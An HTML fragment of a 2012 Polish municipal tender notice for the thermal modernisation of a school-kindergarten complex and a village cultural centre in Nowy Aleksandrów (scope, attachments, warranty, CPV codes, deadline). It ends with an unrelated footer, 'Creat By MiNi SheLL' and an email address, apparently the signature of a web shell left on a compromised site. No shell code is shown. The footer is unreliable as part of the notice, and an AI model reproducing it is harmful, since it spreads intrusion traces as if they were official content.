<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termomodernizacja Zespołu Szkolno-Przedszkolnego w Nowym Aleksandrowie, ul. Pogodna 107, 16-002 Dobrzyniewo Duże..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie termomodernizacji trzech budynków w ramach zadania pn. Termomodernizacja obiektów użyteczności publicznej na terenie Gminy Dobrzyniewo Duże. Zakres prac obejmuje: docieplenie (min. wymiana stolarki drzwiowej i okiennej, wymiana pokrycia dachowego, ocieplenie stropodachów, stropów, ścian zewnętrznych piwnic oraz nadziemia budynku styropianem), modernizacja instalacji c.o.. 
Gmina Dobrzyniewo Duże planuje w roku 2012 Termomodernizację  Zespołu Szkolno-Przedszkolnego w Nowym Aleksandrowie, ul. Pogodna 107, 16-002 Dobrzyniewo Duże,
Szczegółowy Opis Przedmiotu Zamówienia zawarty jest w:
a)projektach budowlanym stanowiących Załączniki Nr 8A do SWIZ ,
b)audytach energetycznych - dokument nadrzędny względem pozostałych-w szczególności w zakresie parametrów zastosowanych materiałów, stanowiących Załączniki Nr 8B do SIWZ , oraz 
c)Specyfikacjach technicznych wykonania i odbioru robót (STWiOR) stanowiących Załączniki Nr 8C do SWIZ, 
d)Przedmiarach robót stanowiących Załączniki nr  8D I 8E do SIWZ.
Pozostałe warunki dotyczące wykonania zamówienia zostały określone w Istotnych Postanowieniach Umowy - Załącznik Nr 10 do SIWZ.
Wykonawca udzieli gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres 36 miesięcy licząc od daty podpisania protokołu odbioru końcowego inwestycji.
Zamawiający dysponuje przedmiarami robót, które załącza do SIWZ jako materiał poglądowy. Przedmiary dla Wykonawcy nie mogą stanowić podstawy do wyceny ryczałtowej robót. Cenę ryczałtową należy określić na podstawie dokumentacji projektowej, SIWZ, STWiOR, Audytu energetycznego i ewentualnej wizji w terenie.
Wybrany oferent przed podpisaniem umowy przedstawi kosztorys ofertowy, spełniający wymagania określone w Rozdz. XII SIWZ oraz harmonogram rzeczowo-finansowy.
Zaleca się aby każdy Wykonawca na własny koszt dokonał oględzin budynku celem sprawdzenia i zapoznania się z przyszłym terenem budowy oraz warunkami związanymi z wykonywaniem robót budowlanych objętych przedmiotem zamówienia oraz uzyskania informacji koniecznych do oceny i wyceny wszystkich robót i czynności niezbędnych do realizacji niniejszego zamówienia
Wykonawca ma obowiązek realizacji prac z zakresu termomodernizacji w/w obiekcie budowlanym zgodnie z ustawą z dnia 16 kwietnia 2004r. o ochronie przyrody (Dz. U. Nr 92, poz. 880 z późn. zm.).
Przewiduje się wykonanie przeglądu termowizyjnego wykonanych robót budowlanych przez wskazaną przez Zamawiającego uprawnioną jednostkę na koszt Wykonawcy.  
Wykonawca dostarczy na własny koszt dla Zamawiającego Świadectwo charakterystyki energetycznej po zakończeniu robót w ramach odbioru końcowego oraz inwentaryzacje powykonawczą.
Projekty nie zawierają znaków towarowych. Wymieniona w pkt III i VI firma służy dokładnemu określeniu kolorów, co zostało jasno zapisane w projekcie. Oznacza to jedynie  przyjęty wzorzec jako odnośnik do określenia koloru jaki zaprojektował Projektant w porozumieniu z Inwestorem i jakiego koloru spodziewa się inwestor na obiekcie po wykonaniu termomodernizacji (druk kolorowy w projekcie ze względu na właściwości drukarek może różnić się od jednoznacznie opisanego w taki sposób koloru).
Zaznaczyć natomiast należy, iż zapis w projekcie o dowolnym systemie i tynku o podobnych właściwościach oznacza brak możliwości łączenia elementów różnych systemów dociepleń w całość oraz spełnianie przez przyjęty system parametrów i właściwości tynku, które zostały opisane w projekcie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.11.00-7, 45.42.11.30-4, 45.26.12.00-6, 45.32.10.00-3, 45.44.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Termomodernizacja Wiejskiego Domu Kultury w Nowym Aleksandrowie, ul. Pogodna 109, 16-002 Dobrzyniewo Duże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie termomodernizacji trzech budynków w ramach zadania pn.Termomodernizacja obiektów użyteczności publicznej na terenie Gminy Dobrzyniewo Duże. Zakres prac obejmuje: docieplenie (min. wymiana stolarki drzwiowej i okiennej, wymiana pokrycia dachowego, ocieplenie stropodachów, stropów, ścian zewnętrznych piwnic oraz nadziemia budynku styropianem), modernizacja instalacji c.o.. 
Gmina Dobrzyniewo Duże planuje w roku 2012 Termomodernizację Wiejskiego Domu Kultury w Nowym Aleksandrowie, ul. Pogodna 109, 16-002 Dobrzyniewo Dużym.
Szczegółowy Opis Przedmiotu Zamówienia zawarty jest w:
a)projektach budowlanym stanowiących Załączniki Nr 9A do SIWZ
b)audytach energetycznych - dokument nadrzędny względem pozostałych-w szczególności w zakresie parametrów zastosowanych materiałów, stanowiących Załączniki Nr 9B do SIWZ oraz 
c)Specyfikacjach technicznych wykonania i odbioru robót (STWiOR) stanowiących Załączniki Nr 9C do SIWZ).
d)Przedmiarach robót stanowiących Załączniki nr  9D I 9E do SIWZ).
Pozostałe warunki dotyczące wykonania zamówienia zostały określone w Istotnych Postanowieniach Umowy - Załącznik Nr 10 do SIWZ.
Wykonawca udzieli gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres 36 miesięcy licząc od daty podpisania protokołu odbioru końcowego inwestycji.
Zamawiający dysponuje przedmiarami robót, które załącza do SIWZ jako materiał poglądowy. Przedmiary dla Wykonawcy nie mogą stanowić podstawy do wyceny ryczałtowej robót. Cenę ryczałtową należy określić na podstawie dokumentacji projektowej, SIWZ, STWiOR, Audytu energetycznego i ewentualnej wizji w terenie.
Wybrany oferent przed podpisaniem umowy przedstawi kosztorys ofertowy, spełniający wymagania określone w Rozdz. XII SIWZ oraz harmonogram rzeczowo-finansowy.
Zaleca się aby każdy Wykonawca na własny koszt dokonał oględzin budynku celem sprawdzenia i zapoznania się z przyszłym terenem budowy oraz warunkami związanymi z wykonywaniem robót budowlanych objętych przedmiotem zamówienia oraz uzyskania informacji koniecznych do oceny i wyceny wszystkich robót i czynności niezbędnych do realizacji niniejszego zamówienia
Wykonawca ma obowiązek realizacji prac z zakresu termomodernizacji w/w obiektu budowlanego zgodnie z ustawą z dnia 16 kwietnia 2004r. o ochronie przyrody (Dz. U. Nr 92, poz. 880 z późn. zm.).
Przewiduje się wykonanie przeglądu termowizyjnego wykonanych robót budowlanych przez wskazaną przez Zamawiającego uprawnioną jednostkę na koszt Wykonawcy.  
Wykonawca dostarczy na własny koszt dla Zamawiającego Świadectwo charakterystyki energetycznej po zakończeniu robót w ramach odbioru końcowego oraz inwentaryzacje powykonawczą.
Projekty nie zawierają znaków towarowych. Wymieniona w pkt III i VI firma służy dokładnemu określeniu kolorów, co zostało jasno zapisane w projekcie. Oznacza to jedynie  przyjęty wzorzec jako odnośnik do określenia koloru jaki zaprojektował Projektant w porozumieniu z Inwestorem i jakiego koloru spodziewa się inwestor na obiekcie po wykonaniu termomodernizacji (druk kolorowy w projekcie ze względu na właściwości drukarek może różnić się od jednoznacznie opisanego w taki sposób koloru).
Zaznaczyć natomiast należy, iż zapis w projekcie o dowolnym systemie i tynku o podobnych właściwościach oznacza brak możliwości łączenia elementów różnych systemów dociepleń w całość oraz spełnianie przez przyjęty system parametrów i właściwości tynku, które zostały opisane w projekcie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.11.00-7, 45.42.11.30-4, 45.26.12.00-6, 45.32.10.00-3, 45.44.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com